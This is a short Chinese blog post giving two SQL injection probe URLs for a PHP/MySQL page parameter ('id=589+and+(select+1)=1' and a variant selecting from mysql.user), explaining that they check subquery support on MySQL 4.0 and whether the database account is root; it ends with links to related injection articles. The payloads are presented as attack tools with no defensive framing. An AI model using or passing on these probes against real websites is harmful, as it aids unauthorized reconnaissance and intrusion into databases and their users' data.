PHP mysql注入时两条工具语句

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了PHP mysql注入时两条工具语句相关的知识,希望对你有一定的参考价值。

http://***/include/web_content.php?id=589+and+(select+1)=1

这条语句是当mysql版本为4.0的时候用来判断是否支持子查询的,页面返回正确,说明支持子查询,否则不支持。

提交:

http://***/include/web_content.php?id=589+and+(select+1+from+mysql.user+limit+0,1)=1

这条语句是用来判断mysql的当前登录账户是不是root的,如果页面返回正确,则为root,否则不是root

以上是关于PHP mysql注入时两条工具语句的主要内容,如果未能解决你的问题,请参考以下文章

PHP mysql_real_escape_string() 函数防SQL注入

PHP MYSQL网站注入扫描工具如何使用

PHP+mysql注入的基本过程

注入学习 Mysql+php注入 基于bool和时间的盲注

SQL注入实战-MySQL

运维安全-MySQL手工注入